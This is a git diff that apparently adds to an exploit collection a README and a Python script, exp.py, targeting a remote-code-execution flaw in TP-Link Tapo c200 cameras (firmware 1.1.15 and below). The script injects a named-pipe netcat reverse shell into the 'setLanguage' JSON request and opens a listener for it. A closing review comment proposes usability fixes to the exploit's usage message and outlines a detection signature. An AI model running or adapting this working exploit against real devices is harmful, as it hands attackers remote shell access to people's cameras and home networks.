diff --git a/19-华为路由器/DG8045 Router 1.0/readme.md b/19-路由器/01-华为路由器/DG8045 Router 1.0/readme.md
similarity index 100%
rename from 19-华为路由器/DG8045 Router 1.0/readme.md
rename to 19-路由器/01-华为路由器/DG8045 Router 1.0/readme.md
diff --git a/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/README.md b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/README.md
new file mode 100644
index 0000000..23e3e09
--- /dev/null
+++ b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/README.md
@@ -0,0 +1,10 @@
+TP-Link Tapo c200 1.1.15--RCE 漏洞
+
+### 影响版本
+1.1.15 and below
+
+### exp 利用
+
+```shell
+python3 exp.py
+```
\ No newline at end of file
diff --git a/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/exp.py b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/exp.py
new file mode 100644
index 0000000..2296ea4
--- /dev/null
+++ b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/exp.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+
+import os
+import requests
+import sys
+import threading
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# nc command to receive reverse shell (change it depending on your nc version)
+PORT = 1337
+REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
+NC_COMMAND = 'nc -lv %d' % PORT
+
+if len(sys.argv) < 3:
+    print("Usage: python3 pwnTapo.py ")
+    exit()
+
+victim = sys.argv[1]
+attacker = sys.argv[2]
+
+print("[+] Listening on %d" % PORT)
+t = threading.Thread(target=os.system, args=(NC_COMMAND,))
+t.start()
+
+print("[+] Serving payload to %s\n" % victim)
+url = "https://" + victim + ":443/"
+json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
+requests.post(url, json=json, verify=False)
\ No newline at end of file
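Review bot: The usage message in exp.py, `print("Usage: python3 pwnTapo.py ")`, names a file that is not in this commit and lists neither of the two positional arguments the script then reads as `sys.argv[1]` and `sys.argv[2]`, so a wrong invocation gives no hint of what is missing (the placeholders may have been lost in rendering; that is a guess). Suggest `print("Usage: python3 exp.py <victim-host> <listener-host>")` followed by `sys.exit(1)` instead of the interactive-shell helper `exit()`, since `sys` is already imported. The file also has no module docstring; one that states the affected product and versions given in the sibling README ("TP-Link Tapo c200, 1.1.15 and below") and that the request of interest is a POST to the device's HTTPS root whose JSON carries `"method": "setLanguage"` with shell metacharacters in `params.payload` would let a defender derive a detection rule or a firmware-upgrade check without reading the payload string. The README hunk's `python3 exp.py` example has the same omission and should show the same two arguments.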